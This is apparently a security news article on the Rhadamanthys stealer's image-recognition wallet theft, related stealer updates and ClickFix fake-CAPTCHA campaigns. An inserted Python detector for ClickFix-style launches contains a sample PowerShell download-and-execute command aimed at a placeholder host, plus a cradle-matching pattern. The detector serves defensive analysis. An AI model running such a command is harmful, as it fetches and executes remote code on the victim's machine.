Monday, February 17, 2025

AI-Powered Rhadamanthys Stealer Uses Image Recognition to Target Cryptocurrency Wallets

Artificial intelligence (AI) for optical character recognition (OCR) is one of the latest advanced features that the threat actors behind the Rhadamanthys information stealer have introduced to the malware under the guise of “Seed Phrase Image Recognition.”

According to Recorded Future’s Insikt Group, which examined version 0.7.0 of the malware, “this allows Rhadamanthys to extract cryptocurrency wallet seed phrases from images, making it a highly potent threat for anyone dealing in cryptocurrencies.”

“The malware can recognize seed phrase images on the client side and send them back to the command-and-control (C2) server for further exploitation.”

Rhadamanthys, which like Lumma is sold under a malware-as-a-service (MaaS) model, was first spotted in the wild in September 2022 and has since become one of the most capable information stealers in circulation.

The malware’s creator, going by the name “kingcrete” (also known as “kingcrete2022”), finds ways to promote the updated versions on Telegram, Jabber, and TOX, despite facing bans from underground forums like Exploit and XSS for targeting organizations in Russia and the former Soviet Union.

The cybersecurity company, which Mastercard is expected to acquire for $2.65 billion, said the stealer is sold on a subscription basis for $250 per month (or $550 for ninety days), enabling its customers to extract a wide range of sensitive data from infected hosts.

This includes system information, credentials, cookies, browser passwords, cryptocurrency wallets, and data stored in many other applications, while also taking steps to make analysis in sandboxed environments more difficult.

Rhadamanthys’s most current version, 0.7.0, was released in June 2024 and is a major improvement over version 0.6.0, which was released in February 2024.

According to Recorded Future, it includes a “complete rewrite of both client-side and server-side frameworks, improving the program’s execution stability.” “30 wallet-cracking algorithms, AI-driven visuals, and PDF recognition for word extraction were introduced as well. The capacity to extract text was improved to recognize several saved phrases.”

Also included is a capability that lets threat actors run and install Microsoft Software Installer (MSI) files, apparently to avoid detection by security products installed on the host. In addition, it has a setting that prevents re-execution for a user-specified period of time.

AI-Powered Rhadamanthys Stealer

One notable feature of Rhadamanthys is its plugin system, which extends the stealer with keylogger, cryptocurrency clipper, and reverse proxy functionality.

Rhadamanthys remains a popular choice among cybercriminals, according to Recorded Future. “Coupled with its rapid development and innovative new features, it is a formidable threat all organizations should be aware of.”

The report was published at the same time that Google-owned Mandiant revealed how Lumma Stealer uses customized control flow indirection to manipulate its own execution.

“This technique thwarts all binary analysis tools including IDA Pro and Ghidra, significantly hindering not only the reverse engineering process, but also automation tooling designed to capture execution artifacts and generate detections,” claimed researchers Nino Isakovic and Chuong Dong.

In recent weeks, Rhadamanthys and Lumma, as well as other stealer families such as Meduza, StealC, Vidar, and WhiteSnake, have shipped updates designed to collect cookies from the Chrome web browser, thereby bypassing recently introduced security measures such as app-bound encryption.

To further emphasize how the malware landscape is constantly changing, the creators of the WhiteSnake Stealer have added the capability to collect CVC codes from credit cards that are stored in Chrome.


But that’s not all. Researchers have discovered an Amadey malware campaign that uses an AutoIt script to force the victim’s browser into kiosk mode, pressuring the user into entering their Google account credentials. The browser then saves those credentials to its on-disk credential store, from which stealers like StealC can later retrieve them.

These continuous upgrades also coincide with the discovery of new drive-by download campaigns that distribute information stealers by tricking users into manually copying and running PowerShell scripts in order to “verify” themselves on a fake CAPTCHA page.

According to CloudSEK, eSentire, Palo Alto Networks Unit 42, and Secureworks, users searching Google for video streaming services are redirected to a malicious URL that instructs them to press the Windows key + R to open the Run dialog, paste an encoded PowerShell command, and execute it.

The attack is a variation of the ClickFix campaign that ReliaQuest, Proofpoint, McAfee Labs, and Trellix have been documenting in recent months. It ultimately delivers stealers such as Lumma, StealC, and Vidar.

“This novel attack vector poses significant risk, as it circumvents browser security controls by opening a command prompt,” warned Secureworks. “The victim is then directed to execute unauthorized code directly on their host.”
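The ClickFix chain described above leaves a characteristic trace: PowerShell launched from the Run dialog (whose parent is explorer.exe) with a base64-encoded command. The following detection logic is an added example, not code from the article or any of the vendors it cites; the event records and the payload string are constructed samples, and the placeholder.invalid domain is not a real indicator.

```python
import base64
import re

# PowerShell's -EncodedCommand takes base64 of UTF-16LE text; the same
# transform lets us build a constructed sample without hand-typing base64.
def encode_ps(cmd: str) -> str:
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")

# Constructed sample payload (placeholder domain, not an indicator).
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/x.ps1')"

# Constructed Sysmon-style process-creation records: one ClickFix-like
# launch from the Run dialog, one benign developer invocation.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc " + encode_ps(SAMPLE_PAYLOAD)},
    {"ParentImage": r"C:\Program Files\Git\bin\bash.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File build.ps1"},
]

# PowerShell accepts abbreviated switches, so match the common short forms.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Download-and-execute cradles typically seen in the decoded stage.
CRADLE = re.compile(r"downloadstring|invoke-webrequest|\biwr\b|\biex\b|invoke-expression|mshta",
                    re.IGNORECASE)

def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(event: dict) -> dict:
    """Flag PowerShell spawned by explorer.exe (the Run dialog's parent) carrying an encoded payload.
    The pasted command also persists in HKCU\\...\\Explorer\\RunMRU, a useful forensic artifact."""
    decoded = decode_encoded_command(event["CommandLine"])
    from_run_dialog = event["ParentImage"].lower().endswith(r"\explorer.exe")
    is_ps = event["Image"].lower().endswith("powershell.exe")
    reasons = []
    if is_ps and from_run_dialog and decoded is not None:
        reasons.append("encoded PowerShell launched from explorer.exe (Run dialog)")
        if CRADLE.search(decoded):
            reasons.append("decoded payload contains a download/execute cradle")
    return {"suspicious": bool(reasons), "decoded": decoded, "reasons": reasons}

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify(ev))
```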

Phishing and malvertising campaigns have also been observed distributing Atomic macOS Stealer (AMOS), Rilide, and a recently discovered stealer malware variant known as Snake Keylogger (also known as 404 Keylogger or KrakenKeylogger).

In addition, a cybercrime group called Marko Polo has used information stealers such as Atomic, Rhadamanthys, and StealC in over 30 scam campaigns, posing as reputable companies in the fields of productivity software, online gaming, and virtual meetings in order to steal cryptocurrency across platforms.

“Marko Polo primarily targets gamers, cryptocurrency influencers, and software developers via spear-phishing on social media — highlighting its focus on tech-savvy victims,” Recorded Future stated, adding that “likely tens of thousands of devices have been compromised globally.”
